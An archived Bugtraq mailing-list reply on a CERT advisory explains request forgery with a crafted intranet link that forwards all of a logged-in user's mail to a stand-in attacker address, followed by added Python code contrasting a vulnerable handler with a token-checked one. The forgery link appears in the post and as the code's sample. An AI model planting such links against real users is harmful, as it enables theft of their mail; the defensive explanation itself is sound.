Bugtraq mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT
Shockro,

The danger is also in variables. Pretend that I get you to click on this link from within your custom intranet mail app.

http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example com

It would forward all of your mail to badguy () example com. This would work because you already have a session with mailbox.asp. Of course mailbox.asp is fake but you get the idea.

-Cassius
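
The request described in the message above, modelled in Python as an added example that is not part of the original post: a handler that acts on the session cookie alone, beside one that requires POST and a per-session token. The handler names, the in-memory session store and the `csrf_token` field are assumptions made for illustration; mailbox.asp is hypothetical, as the post says.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

SESSIONS = {}  # session id -> {"user": ..., "csrf": ...} (in-memory stand-in)

def login(user):
    """Create a session and a per-session anti-forgery token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    return sid

def forward(params):
    return 200, "forwarding %s to %s" % (params.get("item"), params.get("recipient"))

def handle_naive(method, url, cookie_sid):
    """Behaviour the post describes: any request carrying the session cookie
    is acted on, so a clicked link is enough. The method is not checked."""
    if cookie_sid not in SESSIONS:
        return 401, "no session"
    query = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    if query.get("action") == "forward":
        return forward(query)
    return 400, "unknown action"

def handle_hardened(method, url, cookie_sid, form=None):
    """State changes need POST plus a token the browser does not attach
    automatically, so a link alone cannot trigger them. Query string ignored."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "no session"
    if method != "POST":
        return 405, "state changes require POST"
    form = form or {}
    supplied = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(supplied, session["csrf"].encode()):
        return 403, "missing or wrong token"
    if form.get("action") == "forward":
        return forward(form)
    return 400, "unknown action"

# Constructed sample: the link from the post, with the address written out.
LINK = ("http://intranet.example.com/mailbox.asp"
        "?action=forward&item=all&recipient=badguy@example.com")

if __name__ == "__main__":
    sid = login("victim")
    print(handle_naive("GET", LINK, sid))     # the link alone is accepted
    print(handle_hardened("GET", LINK, sid))  # rejected: wrong method, no token
```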